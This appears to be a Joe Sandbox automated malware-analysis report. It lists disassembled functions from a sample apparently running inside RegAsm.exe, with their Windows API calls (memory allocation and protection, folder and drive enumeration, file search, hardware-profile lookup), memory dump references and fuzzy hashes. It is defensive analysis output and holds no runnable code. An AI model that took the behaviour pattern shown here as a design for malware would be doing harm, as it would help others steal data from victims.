                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$lstrcpy$lstrcat$FileFindFirstFolderPathlstrlen
                                                                            • String ID: \..\
                                                                            • API String ID: 271224408-4220915743
                                                                            • Opcode ID: f86a2bfd5b95d5ce54e47b1d76212992246169cb21603bc030c522c566867405
                                                                            • Instruction ID: d1c5d3571bf2dc713ef600a72c9e8dce1a4866c2c46e34e82ec1ac83aff49398
                                                                            • Opcode Fuzzy Hash: f86a2bfd5b95d5ce54e47b1d76212992246169cb21603bc030c522c566867405
                                                                            • Instruction Fuzzy Hash: BEA17EB1900288AACB14FBE5D516BDDBBB4AF19308F50417EE845736C2DB78170CCBA6
                                                                            Function 00405E09 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 107COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (@
                                                                            • API String ID: 0-1346038526
                                                                            • Opcode ID: 14c096e7427ac56c3ceb53db33e20d9e6aa561a8e8b35fd361e21ef125d2a38f
                                                                            • Instruction ID: a472476b622eda2900000c9113d1a74c1da44a18ff9f30f91f8d3e78ba7694db
                                                                            • Opcode Fuzzy Hash: 14c096e7427ac56c3ceb53db33e20d9e6aa561a8e8b35fd361e21ef125d2a38f
                                                                            • Instruction Fuzzy Hash: 2B4136B190461AAFCF14EF94D9909AFBBB1EB04314F10447FEA05B7391D6789A818F98
                                                                            Function 00405D69 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualProtect.KERNEL32(?,?,00000002,00000002,?,00000000,?,?,00405E98), ref: 00405DE8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-3916222277
                                                                            • Opcode ID: b6b970fa2179954ca2d24890c2a9fa622aa91f7321e7267b4cd12840a3a9e1b1
                                                                            • Instruction ID: ced7d7a04c1373fcb48adb74aa7fd2d2290691d2abba1c02f51b3daadd827661
                                                                            • Opcode Fuzzy Hash: b6b970fa2179954ca2d24890c2a9fa622aa91f7321e7267b4cd12840a3a9e1b1
                                                                            • Instruction Fuzzy Hash: A7113A71515A0AEBEF20CF94C9887ABB7F5FF04340F6084279541E62C0D7789A85EFA9
                                                                            Function 00410D21 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FolderPathlstrcpy
                                                                            • String ID: ;\B
                                                                            • API String ID: 1699248803-1503912327
                                                                            • Opcode ID: 83e6cc5221987d8d92d423f576c0c857877c6fa4a6664693c3a0d08b49ab16c4
                                                                            • Instruction ID: 14537dfbc9dced5e712fe60e3e3a31c8263f1f5987e60415cd97e08317604fbc
                                                                            • Opcode Fuzzy Hash: 83e6cc5221987d8d92d423f576c0c857877c6fa4a6664693c3a0d08b49ab16c4
                                                                            • Instruction Fuzzy Hash: 27F01C7990014CBBDB51DB64C8909EDB7FDEBC4704F0091A6A90593280D6349F459B50
                                                                            Function 00411250 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SHFileOperationA.SHELL32(?), ref: 00411289
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileOperation
                                                                            • String ID: ^qA
                                                                            • API String ID: 3080627654-2929517337
                                                                            • Opcode ID: 16d3a2ce8468c8175a4b0748f848a8e721ac03b0a06bcb47fc2447d8941ceac4
                                                                            • Instruction ID: 1eaf247a329aa75c86d9425b1c51e37de0b4722cea675766f58cecf8dc0fcae1
                                                                            • Opcode Fuzzy Hash: 16d3a2ce8468c8175a4b0748f848a8e721ac03b0a06bcb47fc2447d8941ceac4
                                                                            • Instruction Fuzzy Hash: 68E075B0E0421D9FCB44EFA4D5466EEBBF8FF48308F40806AD919F7240E7B456458BA9
                                                                            Function 004104A2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentHwProfileA.ADVAPI32(?), ref: 004104B3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CurrentProfile
                                                                            • String ID: Unknown
                                                                            • API String ID: 2104809126-1654365787
                                                                            • Opcode ID: 36caf4ab5cc3db7ce453f452f44e3bfd2793be26340c29108ddef0f291e38d6b
                                                                            • Instruction ID: 7df7fbcbbed776e4458085ee5b54356bf3053a549426d159850edd6d89fd8832
                                                                            • Opcode Fuzzy Hash: 36caf4ab5cc3db7ce453f452f44e3bfd2793be26340c29108ddef0f291e38d6b
                                                                            • Instruction Fuzzy Hash: D6E0C270A0010DFBDB10EBA4DA85FDD37BC6B04348F508125A601E3180DBBCE648CBA9
                                                                            Function 00410CDD Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00410CE2
                                                                            • GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425BF6,?,?), ref: 00410CF6
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AttributesFileH_prolog
                                                                            • String ID:
                                                                            • API String ID: 3244726999-0
                                                                            • Opcode ID: 9858cde492175e4580259da3237b0586ce143e2643660db7b1ce31a318e284b7
                                                                            • Instruction ID: 23f90a50d93cb2e1358a652bfa6555910aea1ee46ff196ae4cba0ec79dbf811d
                                                                            • Opcode Fuzzy Hash: 9858cde492175e4580259da3237b0586ce143e2643660db7b1ce31a318e284b7
                                                                            • Instruction Fuzzy Hash: BEE09B305005149BC714AFA4E4016CDB720EF05764F10422EE866A25D5C7385B45C684
                                                                            Function 00405A53 Relevance: 2.6, APIs: 2, Instructions: 68memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(?,00000000,00003000,00000040,?,00000000,?,?,00405E55,00000000,00000000), ref: 00405AB2
                                                                            • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,00000000,?,?,00405E55,00000000,00000000), ref: 00405ADE
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 1c251f108aa80a173728c8da74072c4a570c277b0e51025ace0a2ede7004c7e8
                                                                            • Instruction ID: 0100467e13e99263edfc9c933cb68e83bd3c9ecc7dabaf0022702558aaebf942
                                                                            • Opcode Fuzzy Hash: 1c251f108aa80a173728c8da74072c4a570c277b0e51025ace0a2ede7004c7e8
                                                                            • Instruction Fuzzy Hash: 2521AE71700B059BDB24CFB4CC81BABB7F5EB44314F24492AE61AD72D0D278AD408F18
                                                                            Function 0040D3FA Relevance: 1.7, APIs: 1, Instructions: 221COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0040D3FF
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                              • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425BF6,?,?), ref: 00410CF6
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 0040A893: _EH_prolog.MSVCRT ref: 0040A898
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                            • String ID:
                                                                            • API String ID: 2625060131-0
                                                                            • Opcode ID: 376a3a712f82bb87cd6dc28791a904098dcfe9595fc6229afb21645f8f31d16a
                                                                            • Instruction ID: c334b669d827ce9460b6e052bb784494c4e07a697f8de2f8e66076f210601346
                                                                            • Opcode Fuzzy Hash: 376a3a712f82bb87cd6dc28791a904098dcfe9595fc6229afb21645f8f31d16a
                                                                            • Instruction Fuzzy Hash: 63915F71D0024CEACF11EBE5D952BDEBBB8AF14308F10417EE44573282DA78570C8B66
                                                                            Function 0040A893 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0040A898
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 00409F72: _EH_prolog.MSVCRT ref: 00409F77
                                                                              • Part of subcall function 00409F72: FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,?,?,00425BAE,00000000,-00000020,00000000), ref: 00409FF6
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$FileFindFirstlstrcpy
                                                                            • String ID:
                                                                            • API String ID: 1592259726-0
                                                                            • Opcode ID: 04f1566bf03f5b57a7be48995494788b674163e3f1712f7d1c8d8cfa6d3f667e
                                                                            • Instruction ID: 11f6703c6529ff65c6027a0a45f3fdb3f97caadc550874a50ef78dc79f4eaafe
                                                                            • Opcode Fuzzy Hash: 04f1566bf03f5b57a7be48995494788b674163e3f1712f7d1c8d8cfa6d3f667e
                                                                            • Instruction Fuzzy Hash: F62171B1900249EBDF20FFA9C9067DDBFB4AF45314F00416EE88963281D7795708CBA6
                                                                            Function 00401ED6 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00401EDB
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 00401162: _EH_prolog.MSVCRT ref: 00401167
                                                                              • Part of subcall function 00401162: FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00422374,?,?,?,00422370,?,?,00000000,?,00000000), ref: 004013AC
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$FileFindFirstlstrcpy
                                                                            • String ID:
                                                                            • API String ID: 1592259726-0
                                                                            • Opcode ID: 07963b33fdd111526faf395668dc4852c6ae53a02adfa156883a701ca86dbaae
                                                                            • Instruction ID: 28e08b363bcf4c13626f635e6ad0a869a568ad08ab8b3845b1d26a2f95c805ed
                                                                            • Opcode Fuzzy Hash: 07963b33fdd111526faf395668dc4852c6ae53a02adfa156883a701ca86dbaae
                                                                            • Instruction Fuzzy Hash: 4A215071D00249ABDF20FB69C94679DBFB4AF44714F00452EE89873282DB395749CBD6
                                                                            Function 00415A3A Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00415A3F
                                                                              • Part of subcall function 00412D62: _EH_prolog.MSVCRT ref: 00412D67
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 00415843: _EH_prolog.MSVCRT ref: 00415848
                                                                              • Part of subcall function 00415843: GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004158AA
                                                                              • Part of subcall function 00415843: memset.MSVCRT ref: 004158C9
                                                                              • Part of subcall function 00415843: GetDriveTypeA.KERNEL32(?), ref: 004158D2
                                                                              • Part of subcall function 00415843: lstrcpy.KERNEL32(?,00000000), ref: 004158F2
                                                                              • Part of subcall function 00415843: lstrcpy.KERNEL32(?,00000000), ref: 00415933
                                                                              • Part of subcall function 00415843: lstrlenA.KERNEL32(?), ref: 00415998
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
